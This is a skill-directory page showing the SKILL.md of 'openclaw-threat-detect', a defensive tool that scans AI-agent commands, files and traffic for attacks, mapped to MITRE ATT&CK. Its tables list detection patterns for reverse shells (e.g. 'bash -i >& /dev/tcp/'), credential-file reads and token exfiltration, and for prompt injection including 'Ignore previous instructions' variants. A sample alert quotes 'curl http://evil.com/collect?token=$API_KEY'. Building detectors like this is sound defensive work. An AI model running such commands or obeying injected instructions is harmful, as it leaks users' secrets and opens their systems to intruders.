Skip to main content
ClaudeWave
Skill282 estrellas del repoactualizado yesterday

openclaw-threat-detect

OpenClaw Threat Detect is a security tool that identifies malicious attack patterns in AI Agent environments by analyzing commands, files, and network traffic against MITRE ATT&CK frameworks. Use this skill to detect high-risk behaviors including data exfiltration, reverse shells, file leaks, prompt injection attacks, and supply chain poisoning in OpenClaw instances, providing real-time and offline threat analysis with severity-based alerting.

Ver fuenteRepositorio: JoySafeter
Instalar en Claude Code
Copiar
git clone --depth 1 https://github.com/jd-opensource/JoySafeter /tmp/openclaw-threat-detect && cp -r /tmp/openclaw-threat-detect/skills/openclaw-threat-detect ~/.claude/skills/openclaw-threat-detect
Después abre una sesión nueva de Claude Code; el skill carga automáticamente.
Definición

SKILL.md

# OpenClaw 攻击模式检测器

基于《OpenClaw 极简安全实践指南》红线规则和 MITRE ATT&CK 框架,对命令、文件、网络流量进行实时和离线威胁检测。覆盖 AI Agent 场景下特有的攻击面——不仅检测传统 shell 攻击,还识别通过 Prompt 注入触发的间接恶意行为。

## Purpose

OpenClaw Agent 具有命令执行、文件读写、网络请求等能力。当 Agent 被恶意 Prompt 注入或加载了被投毒的 Skill 时,可能执行数据外传、反弹 Shell、凭证窃取等高危操作。本技能提供多层检测能力,覆盖从命令级到行为链级的威胁识别。

## Prerequisites

### Authorization Requirements
- OpenClaw 实例的日志访问权限
- 命令历史和文件系统读取权限
- 网络流量监控权限(如需实时检测)

### Environment Setup
- 目标 OpenClaw 实例运行中或有历史日志可供分析
- 检测规则库已加载(内置于脚本中)

## Core Workflow

1. **命令级检测**: 对单条命令进行实时模式匹配,识别已知恶意命令模式。
2. **文件级扫描**: 扫描 Skill 文件、脚本文件,检测嵌入的恶意代码和混淆载荷。
3. **行为链分析**: 关联多条命令的上下文,识别多步攻击链(如先侦察再外传)。
4. **网络流量检测**: 分析出站连接目标,检测数据外传和 C2 通信模式。
5. **Prompt 注入检测**: 识别通过 Prompt 注入间接触发的恶意操作指令。
6. **告警与响应**: 按严重程度分级告警,提供阻断建议和取证信息。

## 检测的攻击模式

### 1. 数据外传 (Data Exfiltration)

| 模式 | 检测规则 | 严重程度 | MITRE ATT&CK |
|------|---------|---------|--------------|
| curl/wget 携带凭证 | `curl.*[?&](token\|key\|password\|secret)=` | CRITICAL | T1041 |
| POST 外传敏感数据 | `curl -X POST.*(-d\|--data).*` + 敏感关键词 | CRITICAL | T1041 |
| DNS 隧道外传 | `dig\|nslookup\|host` + base64 编码子域 | HIGH | T1048.003 |
| 环境变量泄露 | `env\|printenv\|echo \$.*KEY` + 网络命令 | CRITICAL | T1552.001 |
| 编码后外传 | `base64\|xxd\|od` 管道到网络命令 | HIGH | T1132.001 |
| 剪贴板窃取 | `xclip\|xsel\|pbpaste` + 网络命令 | HIGH | T1115 |

### 2. 反弹 Shell (Reverse Shell)

| 模式 | 检测规则 | 严重程度 | MITRE ATT&CK |
|------|---------|---------|--------------|
| Bash 反弹 | `bash -i >& /dev/tcp/` | CRITICAL | T1059.004 |
| Python 反弹 | `python.*socket.*connect.*exec` | CRITICAL | T1059.006 |
| Netcat 反弹 | `nc\|ncat.*-e\|exec` | CRITICAL | T1059 |
| Perl 反弹 | `perl.*socket.*INET.*exec` | CRITICAL | T1059 |
| PHP 反弹 | `php.*fsockopen.*exec` | CRITICAL | T1059 |
| Socat 反弹 | `socat.*TCP:.*EXEC:` | CRITICAL | T1059 |
| Node.js 反弹 | `node.*child_process.*net.Socket` | CRITICAL | T1059.007 |
| Mkfifo 管道 | `mkfifo.*/tmp/.*nc` | CRITICAL | T1059 |

### 3. 文件泄露 (File Exfiltration)

| 模式 | 检测规则 | 严重程度 | MITRE ATT&CK |
|------|---------|---------|--------------|
| SSH 密钥外传 | `scp\|rsync.*~/.ssh/` | CRITICAL | T1552.004 |
| OpenClaw 配置外传 | 任何工具读取 `~/.openclaw/` 后接网络命令 | CRITICAL | T1005 |
| 文件打包上传 | `tar\|zip.*` + `curl\|wget` 上传 | HIGH | T1560.001 |
| 历史记录外传 | 读取 `.bash_history`, `.zsh_history` | HIGH | T1552.003 |
| 数据库文件访问 | 读取 `*.sqlite`, `*.db`, `*.sql` | MEDIUM | T1005 |
| 凭证文件读取 | 读取 `.env`, `.npmrc`, `.pypirc`, `.netrc` | HIGH | T1552.001 |

### 4. 凭证窃取 (Credential Theft)

| 模式 | 检测规则 | 严重程度 | MITRE ATT&CK |
|------|---------|---------|--------------|
| 索要私钥 | Prompt 中请求 private key, seed phrase, mnemonic | CRITICAL | T1552 |
| 键盘记录 | `strace.*read\|script\|tee` 用于捕获输入 | HIGH | T1056 |
| 内存转储 | `gcore\|/proc/*/mem\|/proc/*/maps` | HIGH | T1003 |
| Token 文件读取 | 读取 `*token*`, `*credential*`, `*secret*` 文件 | HIGH | T1552.001 |

### 5. 持久化 (Persistence)

| 模式 | 检测规则 | 严重程度 | MITRE ATT&CK |
|------|---------|---------|--------------|
| Crontab 修改 | `crontab -e\|echo.*crontab\|/etc/cron` | HIGH | T1053.003 |
| SSH authorized_keys | 写入 `~/.ssh/authorized_keys` | CRITICAL | T1098.004 |
| Skill 自修改 | Skill 运行时修改自身或其他 Skill 文件 | HIGH | T1546 |
| 系统服务注册 | `systemctl\|service.*enable\|update-rc.d` | HIGH | T1543 |

### 6. Prompt 注入触发的恶意行为

| 模式 | 检测规则 | 严重程度 |
|------|---------|---------|
| 间接指令注入 | 文档/网页中嵌入的执行指令被 Agent 执行 | CRITICAL |
| 角色劫持 | "Ignore previous instructions" 变体 | HIGH |
| 工具链滥用 | Agent 在无用户确认下连续调用敏感工具 | HIGH |
| 隐蔽数据收集 | Agent 读取敏感文件但不向用户展示 | MEDIUM |

## MITRE ATT&CK 覆盖矩阵

| Tactic | Techniques | 覆盖状态 |
|--------|-----------|---------|
| Initial Access | T1566 (Phishing via Prompt Injection) | ✅ |
| Execution | T1059 (Command/Script Interpreter) | ✅ |
| Persistence | T1053, T1098, T1543, T1546 | ✅ |
| Credential Access | T1003, T1056, T1552 | ✅ |
| Collection | T1005, T1115 | ✅ |
| Exfiltration | T1041, T1048, T1560 | ✅ |
| Command & Control | T1071, T1132 | ✅ |

## 输出格式

每条告警包含以下字段:

```json
{
  "id": "THREAT-2026-0001",
  "timestamp": "2026-03-13T10:30:00Z",
  "severity": "CRITICAL",
  "category": "data_exfiltration",
  "pattern_matched": "curl with embedded token",
  "command": "curl http://evil.com/collect?token=$API_KEY",
  "mitre_attack": "T1041",
  "context": {
    "user": "node",
    "working_dir": "/home/node/.openclaw/workspace",
    "parent_process": "openclaw-agent",
    "triggered_by": "skill:untrusted-skill-xyz"
  },
  "recommendation": "立即终止命令执行,撤销泄露的 API Key,审查触发该操作的 Skill",
  "evidence": {
    "matched_rule": "exfil_curl_token",
    "confidence": 0.95
  }
}
```

## 严重程度分级

| 等级 | 含义 | 响应要求 |
|------|------|---------|
| **CRITICAL** | 确认的主动攻击行为 | 立即阻断 + 告警 + 取证 |
| **HIGH** | 高概率恶意行为 | 阻断 + 人工确认 |
| **MEDIUM** | 可疑行为,可能是误报 | 记录 + 标记复查 |
| **LOW** | 信息性发现 | 仅记录 |

## Tool Categories

| Category | Tools | Purpose |
|----------|-------|---------|
| 命令检测 | 正则引擎, AST 分析 | 单条命令模式匹配 |
| 文件扫描 | grep, semgrep patterns | 恶意代码和混淆载荷检测 |
| 网络监控 | ss, tcpdump (容器内) | 出站连接和 DNS 查询分析 |
| 行为关联 | 自定义关联引擎 | 多步攻击链识别 |
| 哈希校验 | sha256sum | 文件完整性验证 |
| Prompt 分析 | 模式匹配 + LLM 分类 | Prompt 注入指令检测 |

## References

- `references/tools.md` - 工具函数签名和参数说明
- `references/workflows.md` - 攻击模式检测流程和规则定义
Del mismo repositorio
appSkill
brainstormingSkill

You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. Explores user intent, requirements and design before implementation.

executing-plansSkill

Use when you have a written implementation plan to execute in a separate session with review checkpoints

openclaw-security-checkerSkill

OpenClaw 安全检测工具,基于安全实践指南验证配置安全、权限隔离、网络策略、日志审计和运行时完整性

pdfSkill

Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. When Claude needs to fill in a PDF form or programmatically process, generate, or analyze PDF documents at scale.

pentest-ai-llm-securitySkill

AI/LLM application security testing — prompt injection, jailbreaking, data exfiltration, and insecure output handling per OWASP LLM Top 10.

pentest-api-deepSkill

Deep OWASP API Security Top 10 testing for REST, GraphQL, gRPC, and WebSocket APIs — BFLA, mass assignment, rate limiting, and unsafe consumption.

pentest-business-logicSkill

Business logic vulnerability testing — workflow bypass, payment manipulation, state machine abuse, and function limit circumvention per WSTG-BUSL.